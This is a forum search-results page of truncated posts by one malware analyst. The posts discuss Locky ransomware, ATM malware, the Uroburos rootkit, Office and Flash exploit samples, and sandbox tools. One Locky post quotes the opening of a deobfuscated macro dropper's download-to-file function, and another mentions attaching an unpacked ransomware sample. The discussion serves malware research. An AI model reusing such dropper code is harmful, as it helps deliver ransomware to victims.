Search found 73 matches

by frank_boldewin
Tue Jul 24, 2018 9:48 am
Forum: Malware
Topic: ATM Malware JackPot v2
Replies: 7
Views: 5287

Re: ATM Malware JackPot v2

Does the sample work for you?
On my machines it always crashes.
by frank_boldewin
Wed May 11, 2016 7:39 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Just analysed a new way Locky tries to install on systems. Very small zip-files (<1000 Bytes), after unzipping there's a rar-file and inside this one a .vbe (encrypted .vbs file). The vbs file tries to download and run a locky dropper. Several AV-Scanners suck to detect this. Encrypted .vbe file '**...
by frank_boldewin
Wed Feb 24, 2016 2:14 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Just in case one is interested. attached is an unpacked version of locky.
by frank_boldewin
Tue Feb 23, 2016 4:23 pm
Forum: Malware
Topic: Locky ransomware
Replies: 142
Views: 203099

Re: Locky ransomware

Seems like it stopped working. Servers taken down? maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code: function downloadToFile(url,file) { var xhr=new ActiveXObject("msxml2.xmlhttp"); ado=new ActiveXObject("ADODB.Stream"); xhr.open("GET",url,false); xhr.s...
by frank_boldewin
Fri Aug 07, 2015 10:14 am
Forum: Tools/Software
Topic: [2017-11-05]ARK for Windows X64: WIN64AST(Page10#96)
Replies: 98
Views: 349216

Re: [2015-08-04]ARK for Windows x64: WIN64AST(Page8#78)

i like your tool, though some features are hardly missing.

complete process + driver dump inkl. pe-fixing
memory map (VAD) view for processes including page protections as well as dumping individual pages.
by frank_boldewin
Mon Jan 26, 2015 8:13 am
Forum: Malware
Topic: CVE-2015-0311
Replies: 15
Views: 13124

Re: CVE-2015-0311

Does one of these samples trigger something on your site?
by frank_boldewin
Sat Dec 13, 2014 4:42 pm
Forum: Malware
Topic: Automated Malware Environments
Replies: 12
Views: 9770

Re: Automated Malware Environments

Cuckoo supports VBOX, VMWARE and QEMU KVM. Further it has support for Volatility. The latet Version has a branch to a new API-Monitor, which will integrate in the master branch in the near future. Another plugin is zer0m0n from conix-security which supports kernel hooks and some antivm stuff. And ye...
by frank_boldewin
Fri Apr 04, 2014 1:44 pm
Forum: Malware
Topic: CVE-2014-1761
Replies: 11
Views: 7202

Re: CVE-2014-1761

Sample tested on Windows 7 en - Office 2007 SP3 ---> crash from the stack rewind we can see it triggered the bug and jumped to the first ROP call at 0x275a48e8 (RET at 0x275a48f6) and that a function in wwlib.dll seems to be the source of the bug. 0:000> kb ChildEBP RetAddr Args to Child WARNING: Fr...
by frank_boldewin
Mon Mar 03, 2014 5:29 pm
Forum: Malware
Topic: WinNT/Turla (WinNT/Pfinet, Uroburos rootkit)
Replies: 66
Views: 255863

Re: Uroburos rootkit

Yesterday i wrote on facebook that the Uroboros malware reminds me on a similar case back in 2008. Now i'm pretty sure. When the dropper executes first it checks if it runs on a 32bit or 64bit system to select what driver to drop later. It creates a directory $NtUninstallQ817473 inside the windows d...